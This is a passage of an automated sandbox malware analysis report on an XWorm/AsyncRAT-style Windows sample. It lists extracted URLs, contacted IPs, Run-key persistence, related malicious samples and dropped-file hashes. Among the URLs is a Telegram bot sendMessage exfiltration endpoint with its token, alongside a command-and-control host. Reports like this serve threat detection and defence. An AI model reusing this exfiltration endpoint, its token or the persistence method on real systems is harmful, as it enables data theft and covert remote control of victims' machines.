                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.microsoft.coiopspowershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.telegram.org9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org/bot9RgE5uOJwX.exe, MicrosoftClient.exe.0.drfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.microsoftpowershell.exe, 0000000B.00000002.2648363844.000001867A108000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.microsoft.copowershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2232624832.00000200F2687000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.micpowershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.micft.cMicRosofpowershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=724709RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  149.154.167.220
                                                  		api.telegram.orgUnited Kingdom
                                                  		62041TELEGRAMRUtrue
                                                  147.185.221.23
                                                  		vehicle-temp.gl.at.ply.ggUnited States
                                                  		12087SALSGIVERUStrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1545317
                                                  Start date and time:2024-10-30 12:21:05 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 6m 17s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:15
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:9RgE5uOJwX.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:72f5f19b35b22d82d8459f5e0739c248.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@15/19@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 14.3%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 55
                                                  • Number of non-executed functions: 6
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target MicrosoftClient.exe, PID 4048 because it is empty
                                                  • Execution Graph export aborted for target MicrosoftClient.exe, PID 5580 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 4856 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 5168 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 5268 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7064 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: 9RgE5uOJwX.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  07:22:01API Interceptor54x Sleep call for process: powershell.exe modified
                                                  07:22:52API Interceptor399950x Sleep call for process: 9RgE5uOJwX.exe modified
                                                  12:22:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftClient C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                  12:23:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftClient C:\Users\user\AppData\Local\MicrosoftClient.exe

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  149.154.167.220app64.exeGet hashmaliciousUnknownBrowse
                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                              ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      147.185.221.23rustdesk.exeGet hashmaliciousXWormBrowse
                                                                        q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                                                          mkDhqaw9dx.exeGet hashmaliciousXWormBrowse
                                                                            R7iHtCsOYz.exeGet hashmaliciousXWormBrowse
                                                                              Zvas34nq1T.exeGet hashmaliciousXWormBrowse
                                                                                fMdcaIZWzT.exeGet hashmaliciousXWormBrowse
                                                                                  vtuLkV5KEW.exeGet hashmaliciousXWormBrowse
                                                                                    IGznKtHyTp.exeGet hashmaliciousXWormBrowse
                                                                                      6PJia32WYA.exeGet hashmaliciousNjratBrowse
                                                                                        lx3vLwrX57.exeGet hashmaliciousXWormBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          api.telegram.orgapp64.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          TELEGRAMRUapp64.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          SALSGIVERUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                          • 147.176.169.71
                                                                                          rustdesk.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23
                                                                                          Nurcraft.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.21
                                                                                          q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23
                                                                                          7bZWBYVNPU.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.22
                                                                                          mkDhqaw9dx.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23
                                                                                          R7iHtCsOYz.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23
                                                                                          Zvas34nq1T.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23
                                                                                          fMdcaIZWzT.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23
                                                                                          vtuLkV5KEW.exeGet hashmaliciousXWormBrowse
                                                                                          • 147.185.221.23

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eBiocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          • 149.154.167.220
                                                                                          app64.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          INQ-40152.scrGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          greatthingswithmegood.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          Reff_Yazaki-europe_575810710108_ZnjKTIejsM.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\MicrosoftClient.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\9RgE5uOJwX.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):166912
                                                                                          Entropy (8bit):4.615880115115375
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:9QJaAtooQh0elU0qT9rbRCKGOjEkb2yMnx8Xb627dOnZzWEU:eJaNp9lVYoKGNkb2ymxMhOnZSEU
                                                                                          MD5:72F5F19B35B22D82D8459F5E0739C248
                                                                                          SHA1:0218DD2B354DCFDFF2A11D06B6CF57F53987E9EB
                                                                                          SHA-256:4571751B2B7477FDED0012F46ADED7C86FB93194980897418C17AC917C4D4CC1
                                                                                          SHA-512:AE5FB16700E76A79049B9B92F13EAD1D611B490A1E447ADCC1A6DA35BE611E2C1E2FC618D17CC4F3A2052FD9B4CF261E12C1464474590C30647A40580E9E2D07
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: ditekSHen
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 81%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..g................................. ... ....@.. ....................................@.................................p...K.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H........Y.........&.....................................................(....*.r...p*. ....*..(....*.r...p*. ..e.*.s.........s.........s.........s.........*.r...p*.rf..p*. .O..*.r...p*. ....*.r2..p*. ~.H.*.r...p*. `..*..((...*.r...p*. .(T.*.r...p*. ...*&(....&+.*.+5sY... .... .'..oZ...(*...~....-.(G...(9...~....o[...&.-.*.r...p*.r...p*. S...*.r...p*.rO..p*. E/..*.r...p*. ...*.r...p*. .HJ.*..............j..................s\..............~.........*"(I...+.*:.t....(D...+.

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftClient.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):654
                                                                                          Entropy (8bit):5.380476433908377
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1200f3fr.umw.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m4ooqvu.rkx.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c22fplgp.ftk.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evg5ljc0.lbp.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqehw504.zrr.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1ap1a4r.nhh.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jehizhgh.tgs.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfmc1crw.fnu.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbx5p13a.aei.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
